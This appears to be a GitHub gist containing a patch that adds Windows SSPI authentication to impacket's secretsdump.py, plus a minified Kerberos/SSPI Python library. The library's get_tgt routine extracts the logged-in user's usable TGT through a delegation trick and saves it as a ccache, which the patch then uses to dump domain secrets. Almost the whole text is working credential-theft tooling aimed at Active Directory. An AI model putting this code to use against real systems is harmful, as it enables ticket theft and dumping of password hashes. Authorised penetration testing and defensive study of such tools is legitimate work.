-
-
Save snovvcrash/ff867dbd922ff2c36f480c0a61819f29 to your computer and use it in GitHub Desktop.
Minified version of Python SSPI lib stolen from @ly4k's Certipy (https://github.com/ly4k/Certipy/tree/2780d5361121dd4ec79da3f64cfb1984c4f779c6/certipy/lib/sspi)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
diff --git a/examples/secretsdump.py b/examples/secretsdump.py | |
index a881a8ce..df72fd30 100755 | |
--- a/examples/secretsdump.py | |
+++ b/examples/secretsdump.py | |
@@ -397,6 +397,7 @@ if __name__ == '__main__': | |
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication' | |
' (128 or 256 bits)') | |
group.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file') | |
+ group.add_argument('-sspi', action="store_true", help='Use Windows Integrated Authentication (SSPI)') | |
group = parser.add_argument_group('connection') | |
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ' | |
@@ -465,7 +466,7 @@ if __name__ == '__main__': | |
Keytab.loadKeysFromKeytab(options.keytab, username, domain, options) | |
options.k = True | |
- if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: | |
+ if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None and options.sspi is False: | |
from getpass import getpass | |
password = getpass("Password:") | |
@@ -473,6 +474,24 @@ if __name__ == '__main__': | |
if options.aesKey is not None: | |
options.k = True | |
+ if options.sspi: | |
+ import platform | |
+ if platform.system().lower() != 'windows': | |
+ logging.error('Cannot use SSPI on non-Windows platform') | |
+ sys.exit(1) | |
+ import random, string, ntpath, tempfile | |
+ from impacket.sspi import get_tgt | |
+ dcName = os.environ['LOGONSERVER'].strip('\\') + f'.{os.environ["USERDNSDOMAIN"]}' | |
+ targetSPN = f'HOST/{dcName}' | |
+ logging.debug(f'Trying to get TGS for {repr(targetSPN)} via SSPI') | |
+ ccache = get_tgt(targetSPN) | |
+ ccacheName = ''.join([random.choice(string.ascii_letters) for _ in range(8)]) + '.ccache' | |
+ ccachePath = ntpath.join(tempfile.gettempdir(), ccacheName) | |
+ logging.debug(f'Saving temporary Kerberos Cache: {ccachePath}') | |
+ ccache.saveFile(ccachePath) | |
+ os.environ['KRB5CCNAME'] = ccachePath | |
+ options.k = options.no_pass = True | |
+ | |
dumper = DumpSecrets(remoteName, username, password, domain, options) | |
try: | |
dumper.dump() | |
@@ -481,3 +500,6 @@ if __name__ == '__main__': | |
import traceback | |
traceback.print_exc() | |
logging.error(e) | |
+ finally: | |
+ logging.debug(f'Removing temporary Kerberos Cache: {ccachePath}') | |
+ os.remove(ccachePath) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Reference: https://github.com/ly4k/Certipy/tree/main/certipy/lib/sspi | |
# Author: https://twitter.com/ly4k_ | |
import os | |
import io | |
import enum | |
import string | |
import functools | |
from math import gcd | |
from typing import Dict | |
from struct import pack, unpack | |
from ctypes import ( | |
POINTER, | |
Structure, | |
WinError, | |
addressof, | |
byref, | |
c_byte, | |
c_char, | |
c_char_p, | |
c_int16, | |
c_int32, | |
c_longlong, | |
c_ubyte, | |
c_uint16, | |
c_uint32, | |
c_void_p, | |
cast, | |
create_string_buffer, | |
pointer, | |
sizeof, | |
string_at, | |
windll | |
) | |
from asn1crypto import core | |
from unicrypto import hmac as HMAC | |
from unicrypto.hashlib import md4 | |
from unicrypto.hashlib import md5 as MD5 | |
from unicrypto.hashlib import sha1 as SHA | |
from unicrypto.pbkdf2 import pbkdf2 as PBKDF2 | |
from unicrypto.symmetric import AES, DES, MODE_CBC, MODE_ECB | |
from unicrypto.symmetric import RC4 as ARC4 | |
from unicrypto.symmetric import TDES as DES3 | |
from impacket.krb5.ccache import CCache | |
# -- kerberos.py ----------------------------------------------------- | |
def submit_ticket(ticket_data: bytes): | |
lsa_handle = LsaConnectUntrusted() | |
kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos") | |
message = submit_tkt_helper(ticket_data, logonid=0) | |
ret_msg, ret_status, free_ptr = LsaCallAuthenticationPackage( | |
lsa_handle, kerberos_package_id, message | |
) | |
if ret_status != 0: | |
raise get_lsa_error(ret_status) | |
if len(ret_msg) > 0: | |
LsaFreeReturnBuffer(free_ptr) | |
return True | |
def get_tgt(target: str) -> CCache: | |
ctx = AcquireCredentialsHandle(None, "kerberos", target, SECPKG_CRED.OUTBOUND) | |
res, ctx, data, outputflags, expiry = InitializeSecurityContext( | |
ctx, | |
target, | |
token=None, | |
ctx=ctx, | |
flags=ISC_REQ.DELEGATE | ISC_REQ.MUTUAL_AUTH | ISC_REQ.ALLOCATE_MEMORY, | |
) | |
if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED: | |
lsa_handle = LsaConnectUntrusted() | |
kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos") | |
raw_ticket = extract_ticket(lsa_handle, kerberos_package_id, 0, target) | |
key = Key(raw_ticket["Key"]["KeyType"], raw_ticket["Key"]["Key"]) | |
token = InitialContextToken.load(data[0][1]) | |
ticket = AP_REQ(token.native["innerContextToken"]).native | |
cipher = _enctype_table[ticket["authenticator"]["etype"]] | |
dec_authenticator = cipher.decrypt(key, 11, ticket["authenticator"]["cipher"]) | |
authenticator = Authenticator.load(dec_authenticator).native | |
if authenticator["cksum"]["cksumtype"] != 0x8003: | |
raise Exception("Bad checksum") | |
checksum_data = AuthenticatorChecksum.from_bytes( | |
authenticator["cksum"]["checksum"] | |
) | |
if ChecksumFlags.GSS_C_DELEG_FLAG not in checksum_data.flags: | |
raise Exception("Delegation flag not set") | |
cred_orig = KRB_CRED.load(checksum_data.delegation_data).native | |
dec_authenticator = cipher.decrypt(key, 14, cred_orig["enc-part"]["cipher"]) | |
te = {} | |
te["etype"] = 0 | |
te["cipher"] = dec_authenticator | |
ten = EncryptedData(te) | |
t = {} | |
t["pvno"] = cred_orig["pvno"] | |
t["msg-type"] = cred_orig["msg-type"] | |
t["tickets"] = cred_orig["tickets"] | |
t["enc-part"] = ten | |
krb_cred = KRB_CRED(t) | |
ccache = CCache() | |
ccache.fromKRBCRED(krb_cred.dump()) | |
return ccache | |
def get_tgs(target: str) -> CCache: | |
# can be skipped - start | |
ctx = AcquireCredentialsHandle(None, "kerberos", target, SECPKG_CRED.OUTBOUND) | |
res, ctx, data, _, _ = InitializeSecurityContext( | |
ctx, | |
target, | |
token=None, | |
ctx=ctx, | |
flags=ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION, | |
) | |
if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED: | |
sec_struct = SecPkgContext_SessionKey() | |
QueryContextAttributes(ctx, SECPKG_ATTR.SESSION_KEY, sec_struct) | |
sec_struct.Buffer | |
InitialContextToken.load(data[0][1]).native["innerContextToken"] | |
# can be skipped - end | |
lsa_handle = LsaConnectUntrusted() | |
kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos") | |
raw_ticket = extract_ticket(lsa_handle, kerberos_package_id, 0, target) | |
krb_cred = KRB_CRED.load(raw_ticket["Ticket"]) | |
ccache = CCache() | |
ccache.fromKRBCRED(krb_cred.dump()) | |
return ccache | |
# -- structs.py ------------------------------------------------------ | |
def _to_pascal_case(snake_str: str) -> str: | |
components = snake_str.split("_") | |
return "".join(x.title() for x in components) | |
def _high_bit(value): | |
return value.bit_length() - 1 | |
def _decompose(flag, value): | |
not_covered = value | |
negative = value < 0 | |
members = [] | |
for member in flag: | |
member_value = member.value | |
if member_value and member_value & value == member_value: | |
members.append(member) | |
not_covered &= ~member_value | |
if not negative: | |
tmp = not_covered | |
while tmp: | |
flag_value = 2 ** _high_bit(tmp) | |
if flag_value in flag._value2member_map_: | |
members.append(flag._value2member_map_[flag_value]) | |
not_covered &= ~flag_value | |
tmp &= ~flag_value | |
if not members and value in flag._value2member_map_: | |
members.append(flag._value2member_map_[value]) | |
members.sort(key=lambda m: m._value_, reverse=True) | |
if len(members) > 1 and members[0].value == value: | |
members.pop(0) | |
return members, not_covered | |
class IntFlag(enum.IntFlag): | |
def to_list(self): | |
cls = self.__class__ | |
members, _ = _decompose(cls, self._value_) | |
return members | |
def to_str_list(self): | |
return list(map(lambda x: str(x), self.to_list())) | |
def __str__(self): | |
cls = self.__class__ | |
if self._name_ is not None: | |
return "%s" % (_to_pascal_case(self._name_)) | |
members, _ = _decompose(cls, self._value_) | |
if len(members) == 1 and members[0]._name_ is None: | |
return "%r" % (members[0]._value_) | |
else: | |
return "%s" % ( | |
", ".join( | |
[_to_pascal_case(str(m._name_ or m._value_)) for m in members] | |
), | |
) | |
def __repr__(self): | |
return str(self) | |
TAG = "explicit" | |
APPLICATION = 1 | |
class krb5int32(core.Integer): | |
pass | |
class krb5uint32(core.Integer): | |
pass | |
class KerberosString(core.GeneralString): | |
pass | |
class SequenceOfKerberosString(core.SequenceOf): | |
_child_spec = KerberosString | |
class Realm(KerberosString): | |
pass | |
class PrincipalName(core.Sequence): | |
_fields = [ | |
("name-type", krb5int32, {"tag_type": TAG, "tag": 0}), | |
("name-string", SequenceOfKerberosString, {"tag_type": TAG, "tag": 1}), | |
] | |
class KerberosTime(core.GeneralizedTime): | |
pass | |
class AuthorizationDataElement(core.Sequence): | |
_fields = [ | |
("ad-type", krb5int32, {"tag_type": TAG, "tag": 0}), | |
("ad-data", core.OctetString, {"tag_type": TAG, "tag": 1}), | |
] | |
class AuthorizationData(core.SequenceOf): | |
_child_spec = AuthorizationDataElement | |
class APOptions(core.BitString): | |
_map = { | |
0: "reserved", | |
1: "use-session-key", | |
2: "mutual-required", | |
} | |
class EncryptedData(core.Sequence): | |
_fields = [ | |
("etype", krb5int32, {"tag_type": TAG, "tag": 0}), | |
("kvno", krb5uint32, {"tag_type": TAG, "tag": 1, "optional": True}), | |
("cipher", core.OctetString, {"tag_type": TAG, "tag": 2}), | |
] | |
class EncryptionKey(core.Sequence): | |
_fields = [ | |
("keytype", krb5uint32, {"tag_type": TAG, "tag": 0}), | |
("keyvalue", core.OctetString, {"tag_type": TAG, "tag": 1}), | |
] | |
class Ticket(core.Sequence): | |
explicit = (APPLICATION, 1) | |
_fields = [ | |
("tkt-vno", krb5int32, {"tag_type": TAG, "tag": 0}), | |
("realm", Realm, {"tag_type": TAG, "tag": 1}), | |
("sname", PrincipalName, {"tag_type": TAG, "tag": 2}), | |
("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}), | |
] | |
class SequenceOfTicket(core.SequenceOf): | |
_child_spec = Ticket | |
class Checksum(core.Sequence): | |
_fields = [ | |
("cksumtype", krb5int32, {"tag_type": TAG, "tag": 0}), | |
("checksum", core.OctetString, {"tag_type": TAG, "tag": 1}), | |
] | |
class Authenticator(core.Sequence): | |
explicit = (APPLICATION, 2) | |
_fields = [ | |
("authenticator-vno", krb5int32, {"tag_type": TAG, "tag": 0}), | |
("crealm", Realm, {"tag_type": TAG, "tag": 1}), | |
("cname", PrincipalName, {"tag_type": TAG, "tag": 2}), | |
("cksum", Checksum, {"tag_type": TAG, "tag": 3, "optional": True}), | |
("cusec", krb5int32, {"tag_type": TAG, "tag": 4}), | |
("ctime", KerberosTime, {"tag_type": TAG, "tag": 5}), | |
("subkey", EncryptionKey, {"tag_type": TAG, "tag": 6, "optional": True}), | |
("seq-number", krb5uint32, {"tag_type": TAG, "tag": 7, "optional": True}), | |
( | |
"authorization-data", | |
AuthorizationData, | |
{"tag_type": TAG, "tag": 8, "optional": True}, | |
), | |
] | |
class AP_REQ(core.Sequence): | |
explicit = (APPLICATION, 14) | |
_fields = [ | |
("pvno", krb5int32, {"tag_type": TAG, "tag": 0}), | |
("msg-type", krb5int32, {"tag_type": TAG, "tag": 1}), | |
("ap-options", APOptions, {"tag_type": TAG, "tag": 2}), | |
("ticket", Ticket, {"tag_type": TAG, "tag": 3}), | |
("authenticator", EncryptedData, {"tag_type": TAG, "tag": 4}), | |
] | |
class KRB_CRED(core.Sequence): | |
explicit = (APPLICATION, 22) | |
_fields = [ | |
("pvno", core.Integer, {"tag_type": TAG, "tag": 0}), | |
("msg-type", core.Integer, {"tag_type": TAG, "tag": 1}), | |
("tickets", SequenceOfTicket, {"tag_type": TAG, "tag": 2}), | |
("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}), | |
] | |
class MechType(core.ObjectIdentifier): | |
_map = { | |
"1.3.6.1.4.1.311.2.2.10": "NTLMSSP - Microsoft NTLM Security Support Provider", | |
"1.2.840.48018.1.2.2": "MS KRB5 - Microsoft Kerberos 5", | |
"1.2.840.113554.1.2.2": "KRB5 - Kerberos 5", | |
"1.2.840.113554.1.2.2.3": "KRB5 - Kerberos 5 - User to User", | |
"1.3.6.1.4.1.311.2.2.30": "NEGOEX - SPNEGO Extended Negotiation Security Mechanism", | |
} | |
class InitialContextToken(core.Sequence): | |
class_ = 1 | |
tag = 0 | |
_fields = [ | |
("thisMech", MechType, {"optional": False}), | |
("unk_bool", core.Boolean, {"optional": False}), | |
("innerContextToken", core.Any, {"optional": False}), | |
] | |
_oid_pair = ("thisMech", "innerContextToken") | |
_oid_specs = { | |
"KRB5 - Kerberos 5": AP_REQ, | |
} | |
class ChecksumFlags(enum.IntFlag): | |
GSS_C_DELEG_FLAG = 1 | |
GSS_C_MUTUAL_FLAG = 2 | |
GSS_C_REPLAY_FLAG = 4 | |
GSS_C_SEQUENCE_FLAG = 8 | |
GSS_C_CONF_FLAG = 16 | |
GSS_C_INTEG_FLAG = 32 | |
GSS_C_DCE_STYLE = 0x1000 | |
class AuthenticatorChecksum: | |
def __init__(self): | |
self.length_of_binding = None | |
self.channel_binding = None | |
self.flags = None | |
self.delegation = None | |
self.delegation_length = None | |
self.delegation_data = None | |
self.extensions = None | |
@staticmethod | |
def from_bytes(data): | |
return AuthenticatorChecksum.from_buffer(io.BytesIO(data)) | |
@staticmethod | |
def from_buffer(buffer): | |
ac = AuthenticatorChecksum() | |
ac.length_of_binding = int.from_bytes( | |
buffer.read(4), byteorder="little", signed=False | |
) | |
ac.channel_binding = buffer.read( | |
ac.length_of_binding | |
) | |
ac.flags = ChecksumFlags( | |
int.from_bytes(buffer.read(4), byteorder="little", signed=False) | |
) | |
if ac.flags & ChecksumFlags.GSS_C_DELEG_FLAG: | |
ac.delegation = bool( | |
int.from_bytes(buffer.read(2), byteorder="little", signed=False) | |
) | |
ac.delegation_length = int.from_bytes( | |
buffer.read(2), byteorder="little", signed=False | |
) | |
ac.delegation_data = buffer.read(ac.delegation_length) | |
ac.extensions = buffer.read() | |
return ac | |
def to_bytes(self): | |
t = len(self.channel_binding).to_bytes(4, byteorder="little", signed=False) | |
t += self.channel_binding | |
t += self.flags.to_bytes(4, byteorder="little", signed=False) | |
if self.flags & ChecksumFlags.GSS_C_DELEG_FLAG: | |
t += int(self.delegation).to_bytes(2, byteorder="little", signed=False) | |
t += len(self.delegation_data.to_bytes()).to_bytes( | |
2, byteorder="little", signed=False | |
) | |
t += self.delegation_data.to_bytes() | |
if self.extensions: | |
t += self.extensions.to_bytes() | |
return t | |
# -- encryption.py --------------------------------------------------- | |
def get_random_bytes(lenBytes): | |
return os.urandom(lenBytes) | |
class Enctype(object): | |
DES_CRC = 1 | |
DES_MD4 = 2 | |
DES_MD5 = 3 | |
DES3 = 16 | |
AES128 = 17 | |
AES256 = 18 | |
RC4 = 23 | |
class Cksumtype(object): | |
CRC32 = 1 | |
MD4 = 2 | |
MD4_DES = 3 | |
MD5 = 7 | |
MD5_DES = 8 | |
SHA1 = 9 | |
SHA1_DES3 = 12 | |
SHA1_AES128 = 15 | |
SHA1_AES256 = 16 | |
HMAC_MD5 = -138 | |
class InvalidChecksum(ValueError): | |
pass | |
def _zeropad(s, padsize): | |
padlen = (padsize - (len(s) % padsize)) % padsize | |
return s + b"\x00" * padlen | |
def _xorbytes(b1, b2): | |
assert len(b1) == len(b2) | |
t1 = int.from_bytes(b1, byteorder="big", signed=False) | |
t2 = int.from_bytes(b2, byteorder="big", signed=False) | |
return (t1 ^ t2).to_bytes(len(b1), byteorder="big", signed=False) | |
def _mac_equal(mac1, mac2): | |
assert len(mac1) == len(mac2) | |
res = 0 | |
for x, y in zip(mac1, mac2): | |
res |= x ^ y | |
return res == 0 | |
def _nfold(str, nbytes): | |
def rotate_right(str, nbits): | |
num = int.from_bytes(str, byteorder="big", signed=False) | |
size = len(str) * 8 | |
nbits %= size | |
body = num >> nbits | |
remains = (num << (size - nbits)) - (body << size) | |
return (body + remains).to_bytes(len(str), byteorder="big", signed=False) | |
def add_ones_complement(str1, str2): | |
n = len(str1) | |
v = [] | |
for i in range(0, len(str1), 1): | |
t = str1[i] + str2[i] | |
v.append(t) | |
while any(x & ~0xFF for x in v): | |
v = [(v[i - n + 1] >> 8) + (v[i] & 0xFF) for i in range(n)] | |
return b"".join(x.to_bytes(1, byteorder="big", signed=False) for x in v) | |
slen = len(str) | |
lcm = int(nbytes * slen / gcd(nbytes, slen)) | |
bigstr = b"".join((rotate_right(str, 13 * i) for i in range(int(lcm / slen)))) | |
slices = (bigstr[p : p + nbytes] for p in range(0, lcm, nbytes)) | |
return functools.reduce(add_ones_complement, slices) | |
def _is_weak_des_key(keybytes): | |
return keybytes in ( | |
b"\x01\x01\x01\x01\x01\x01\x01\x01", | |
b"\xFE\xFE\xFE\xFE\xFE\xFE\xFE\xFE", | |
b"\x1F\x1F\x1F\x1F\x0E\x0E\x0E\x0E", | |
b"\xE0\xE0\xE0\xE0\xF1\xF1\xF1\xF1", | |
b"\x01\xFE\x01\xFE\x01\xFE\x01\xFE", | |
b"\xFE\x01\xFE\x01\xFE\x01\xFE\x01", | |
b"\x1F\xE0\x1F\xE0\x0E\xF1\x0E\xF1", | |
b"\xE0\x1F\xE0\x1F\xF1\x0E\xF1\x0E", | |
b"\x01\xE0\x01\xE0\x01\xF1\x01\xF1", | |
b"\xE0\x01\xE0\x01\xF1\x01\xF1\x01", | |
b"\x1F\xFE\x1F\xFE\x0E\xFE\x0E\xFE", | |
b"\xFE\x1F\xFE\x1F\xFE\x0E\xFE\x0E", | |
b"\x01\x1F\x01\x1F\x01\x0E\x01\x0E", | |
b"\x1F\x01\x1F\x01\x0E\x01\x0E\x01", | |
b"\xE0\xFE\xE0\xFE\xF1\xFE\xF1\xFE", | |
b"\xFE\xE0\xFE\xE0\xFE\xF1\xFE\xF1", | |
) | |
class _EnctypeProfile(object): | |
@classmethod | |
def random_to_key(cls, seed): | |
if len(seed) != cls.seedsize: | |
raise ValueError("Wrong seed length") | |
return Key(cls.enctype, seed) | |
class _SimplifiedEnctype(_EnctypeProfile): | |
@classmethod | |
def derive(cls, key, constant): | |
plaintext = _nfold(constant, cls.blocksize) | |
rndseed = b"" | |
while len(rndseed) < cls.seedsize: | |
ciphertext = cls.basic_encrypt(key, plaintext) | |
rndseed += ciphertext | |
plaintext = ciphertext | |
return cls.random_to_key(rndseed[0 : cls.seedsize]) | |
@classmethod | |
def encrypt(cls, key, keyusage, plaintext, confounder): | |
ki = cls.derive(key, pack(">IB", keyusage, 0x55)) | |
ke = cls.derive(key, pack(">IB", keyusage, 0xAA)) | |
if confounder is None: | |
confounder = get_random_bytes(cls.blocksize) | |
basic_plaintext = confounder + _zeropad(plaintext, cls.padsize) | |
hmac = HMAC.new(ki.contents, basic_plaintext, cls.hashmod).digest() | |
return cls.basic_encrypt(ke, basic_plaintext) + hmac[: cls.macsize] | |
@classmethod | |
def decrypt(cls, key, keyusage, ciphertext): | |
ki = cls.derive(key, pack(">IB", keyusage, 0x55)) | |
ke = cls.derive(key, pack(">IB", keyusage, 0xAA)) | |
if len(ciphertext) < cls.blocksize + cls.macsize: | |
raise ValueError("ciphertext too short") | |
basic_ctext, mac = ciphertext[: -cls.macsize], ciphertext[-cls.macsize :] | |
if len(basic_ctext) % cls.padsize != 0: | |
raise ValueError("ciphertext does not meet padding requirement") | |
basic_plaintext = cls.basic_decrypt(ke, basic_ctext) | |
hmac = HMAC.new(ki.contents, basic_plaintext, cls.hashmod).digest() | |
expmac = hmac[: cls.macsize] | |
if not _mac_equal(mac, expmac): | |
raise InvalidChecksum("ciphertext integrity failure") | |
return basic_plaintext[cls.blocksize :] | |
@classmethod | |
def prf(cls, key, string): | |
hashval = cls.hashmod(string).digest() | |
truncated = hashval[: -(len(hashval) % cls.blocksize)] | |
kp = cls.derive(key, b"prf") | |
return cls.basic_encrypt(kp, truncated) | |
class _DESCBC(_SimplifiedEnctype): | |
enctype = Enctype.DES_MD5 | |
keysize = 8 | |
seedsize = 8 | |
blocksize = 8 | |
padsize = 8 | |
macsize = 16 | |
hashmod = MD5 | |
@classmethod | |
def encrypt(cls, key, keyusage, plaintext, confounder): | |
if confounder is None: | |
confounder = get_random_bytes(cls.blocksize) | |
basic_plaintext = ( | |
confounder + "\x00" * cls.macsize + _zeropad(plaintext, cls.padsize) | |
) | |
checksum = cls.hashmod.new(basic_plaintext).digest() | |
basic_plaintext = ( | |
basic_plaintext[: len(confounder)] | |
+ checksum | |
+ basic_plaintext[len(confounder) + len(checksum) :] | |
) | |
return cls.basic_encrypt(key, basic_plaintext) | |
@classmethod | |
def decrypt(cls, key, keyusage, ciphertext): | |
if len(ciphertext) < cls.blocksize + cls.macsize: | |
raise ValueError("ciphertext too short") | |
complex_plaintext = cls.basic_decrypt(key, ciphertext) | |
cofounder = complex_plaintext[: cls.padsize] | |
mac = complex_plaintext[cls.padsize : cls.padsize + cls.macsize] | |
message = complex_plaintext[cls.padsize + cls.macsize :] | |
expmac = cls.hashmod.new(cofounder + "\x00" * cls.macsize + message).digest() | |
if not _mac_equal(mac, expmac): | |
raise InvalidChecksum("ciphertext integrity failure") | |
return message | |
@classmethod | |
def mit_des_string_to_key(cls, string, salt): | |
def fixparity(deskey): | |
temp = b"" | |
for byte in deskey: | |
t = (bin(byte)[2:]).rjust(8, "0") | |
if t[:7].count("1") % 2 == 0: | |
temp += int(t[:7] + "1", 2).to_bytes( | |
1, byteorder="big", signed=False | |
) | |
else: | |
temp += int(t[:7] + "0", 2).to_bytes( | |
1, byteorder="big", signed=False | |
) | |
return temp | |
def addparity(l1): | |
temp = list() | |
for byte in l1: | |
if (bin(byte).count("1") % 2) == 0: | |
byte = (byte << 1) | 0b00000001 | |
else: | |
byte = (byte << 1) & 0b11111110 | |
temp.append(byte) | |
return temp | |
def XOR(l1, l2): | |
temp = list() | |
for b1, b2 in zip(l1, l2): | |
temp.append((b1 ^ b2) & 0b01111111) | |
return temp | |
odd = True | |
s = string + salt | |
tempstring = [0, 0, 0, 0, 0, 0, 0, 0] | |
s = s + b"\x00" * (8 - (len(s) % 8)) | |
for block in [s[i : i + 8] for i in range(0, len(s), 8)]: | |
temp56 = list() | |
for byte in block: | |
temp56.append(byte & 0b01111111) | |
if odd == False: | |
bintemp = "" | |
for byte in temp56: | |
bintemp += (bin(byte)[2:]).rjust(7, "0") | |
bintemp = bintemp[::-1] | |
temp56 = list() | |
for bits7 in [bintemp[i : i + 7] for i in range(0, len(bintemp), 7)]: | |
temp56.append(int(bits7, 2)) | |
odd = not odd | |
tempstring = XOR(tempstring, temp56) | |
tempkey = b"".join( | |
byte.to_bytes(1, byteorder="big", signed=False) | |
for byte in addparity(tempstring) | |
) | |
if _is_weak_des_key(tempkey): | |
tempkey[7] = (tempkey[7] ^ 0xF0).to_bytes(1, byteorder="big", signed=False) | |
cipher = DES(tempkey, MODE_CBC, tempkey) | |
chekcsumkey = cipher.encrypt(s)[-8:] | |
chekcsumkey = fixparity(chekcsumkey) | |
if _is_weak_des_key(chekcsumkey): | |
chekcsumkey[7] = chr(ord(chekcsumkey[7]) ^ 0xF0) | |
return Key(cls.enctype, chekcsumkey) | |
@classmethod | |
def basic_encrypt(cls, key, plaintext): | |
assert len(plaintext) % 8 == 0 | |
des = DES(key.contents, MODE_CBC, b"\x00" * 8) | |
return des.encrypt(plaintext) | |
@classmethod | |
def basic_decrypt(cls, key, ciphertext): | |
assert len(ciphertext) % 8 == 0 | |
des = DES(key.contents, MODE_CBC, b"\x00" * 8) | |
return des.decrypt(ciphertext) | |
@classmethod | |
def string_to_key(cls, string, salt, params): | |
if params is not None and params != "": | |
raise ValueError("Invalid DES string-to-key parameters") | |
key = cls.mit_des_string_to_key(string, salt) | |
return key | |
class _DES3CBC(_SimplifiedEnctype): | |
enctype = Enctype.DES3 | |
keysize = 24 | |
seedsize = 21 | |
blocksize = 8 | |
padsize = 8 | |
macsize = 20 | |
hashmod = SHA | |
@classmethod | |
def random_to_key(cls, seed): | |
def expand(seed): | |
def parity(b): | |
b &= ~1 | |
return b if bin(b & ~1).count("1") % 2 else b | 1 | |
assert len(seed) == 7 | |
firstbytes = [parity(b & ~1) for b in seed] | |
lastbyte = parity(sum((seed[i] & 1) << i + 1 for i in range(7))) | |
keybytes = b"".join( | |
b.to_bytes(1, byteorder="big", signed=False) | |
for b in firstbytes + [lastbyte] | |
) | |
if _is_weak_des_key(keybytes): | |
keybytes[7] = (keybytes[7] ^ 0xF0).to_bytes( | |
1, byteorder="big", signed=False | |
) | |
return keybytes | |
if len(seed) != 21: | |
raise ValueError("Wrong seed length") | |
k1, k2, k3 = expand(seed[:7]), expand(seed[7:14]), expand(seed[14:]) | |
return Key(cls.enctype, k1 + k2 + k3) | |
@classmethod | |
def string_to_key(cls, string, salt, params): | |
if params is not None and params != "": | |
raise ValueError("Invalid DES3 string-to-key parameters") | |
k = cls.random_to_key(_nfold(string + salt, 21)) | |
return cls.derive(k, "kerberos".encode()) | |
@classmethod | |
def basic_encrypt(cls, key, plaintext): | |
assert len(plaintext) % 8 == 0 | |
des3 = DES3(key.contents, MODE_CBC, IV=b"\x00" * 8) | |
return des3.encrypt(plaintext) | |
@classmethod | |
def basic_decrypt(cls, key, ciphertext): | |
assert len(ciphertext) % 8 == 0 | |
des3 = DES3(key.contents, MODE_CBC, IV=b"\x00" * 8) | |
return des3.decrypt(ciphertext) | |
class _AESEnctype(_SimplifiedEnctype): | |
blocksize = 16 | |
padsize = 1 | |
macsize = 12 | |
hashmod = SHA | |
@classmethod | |
def string_to_key(cls, string, salt, params): | |
(iterations,) = unpack(">L", params or b"\x00\x00\x10\x00") | |
seed = PBKDF2(string, salt, iterations, cls.seedsize) | |
tkey = cls.random_to_key(seed) | |
return cls.derive(tkey, "kerberos".encode()) | |
@classmethod | |
def basic_encrypt(cls, key, plaintext): | |
assert len(plaintext) >= 16 | |
aes = AES(key.contents, MODE_CBC, b"\x00" * 16) | |
ctext = aes.encrypt(_zeropad(plaintext, 16)) | |
if len(plaintext) > 16: | |
lastlen = len(plaintext) % 16 or 16 | |
ctext = ctext[:-32] + ctext[-16:] + ctext[-32:-16][:lastlen] | |
return ctext | |
@classmethod | |
def basic_decrypt(cls, key, ciphertext): | |
assert len(ciphertext) >= 16 | |
aes = AES(key.contents, MODE_ECB) | |
if len(ciphertext) == 16: | |
return aes.decrypt(ciphertext) | |
cblocks = [ciphertext[p : p + 16] for p in range(0, len(ciphertext), 16)] | |
lastlen = len(cblocks[-1]) | |
prev_cblock = b"\x00" * 16 | |
plaintext = b"" | |
for b in cblocks[:-2]: | |
plaintext += _xorbytes(aes.decrypt(b), prev_cblock) | |
prev_cblock = b | |
b = aes.decrypt(cblocks[-2]) | |
lastplaintext = _xorbytes(b[:lastlen], cblocks[-1]) | |
omitted = b[lastlen:] | |
plaintext += _xorbytes(aes.decrypt(cblocks[-1] + omitted), prev_cblock) | |
return plaintext + lastplaintext | |
class _AES128CTS(_AESEnctype): | |
enctype = Enctype.AES128 | |
keysize = 16 | |
seedsize = 16 | |
class _AES256CTS(_AESEnctype): | |
enctype = Enctype.AES256 | |
keysize = 32 | |
seedsize = 32 | |
class _RC4(_EnctypeProfile): | |
enctype = Enctype.RC4 | |
keysize = 16 | |
seedsize = 16 | |
@staticmethod | |
def usage_str(keyusage): | |
table = {3: 8, 23: 13} | |
msusage = table[keyusage] if keyusage in table else keyusage | |
return pack("<I", msusage) | |
@classmethod | |
def string_to_key(cls, string, salt, params): | |
utf16string = string.decode("UTF-8").encode("UTF-16LE") | |
data = md4(utf16string).digest() | |
return Key(cls.enctype, data) | |
@classmethod | |
def encrypt(cls, key, keyusage, plaintext, confounder): | |
if confounder is None: | |
confounder = get_random_bytes(8) | |
ki = HMAC.new(key.contents, cls.usage_str(keyusage), MD5).digest() | |
cksum = HMAC.new(ki, confounder + plaintext, MD5).digest() | |
ke = HMAC.new(ki, cksum, MD5).digest() | |
return cksum + ARC4(ke).encrypt(confounder + plaintext) | |
@classmethod | |
def decrypt(cls, key, keyusage, ciphertext): | |
if len(ciphertext) < 24: | |
raise ValueError("ciphertext too short") | |
cksum, basic_ctext = ciphertext[:16], ciphertext[16:] | |
ki = HMAC.new(key.contents, cls.usage_str(keyusage), MD5).digest() | |
ke = HMAC.new(ki, cksum, MD5).digest() | |
basic_plaintext = ARC4(ke).decrypt(basic_ctext) | |
exp_cksum = HMAC.new(ki, basic_plaintext, MD5).digest() | |
ok = _mac_equal(cksum, exp_cksum) | |
if not ok and keyusage == 9: | |
ki = HMAC.new(key.contents, pack("<I", 8), MD5).digest() | |
exp_cksum = HMAC.new(ki, basic_plaintext, MD5).digest() | |
ok = _mac_equal(cksum, exp_cksum) | |
if not ok: | |
raise InvalidChecksum("ciphertext integrity failure") | |
return basic_plaintext[8:] | |
@classmethod | |
def prf(cls, key, string): | |
return HMAC.new(key.contents, string, SHA).digest() | |
class _ChecksumProfile(object): | |
@classmethod | |
def verify(cls, key, keyusage, text, cksum): | |
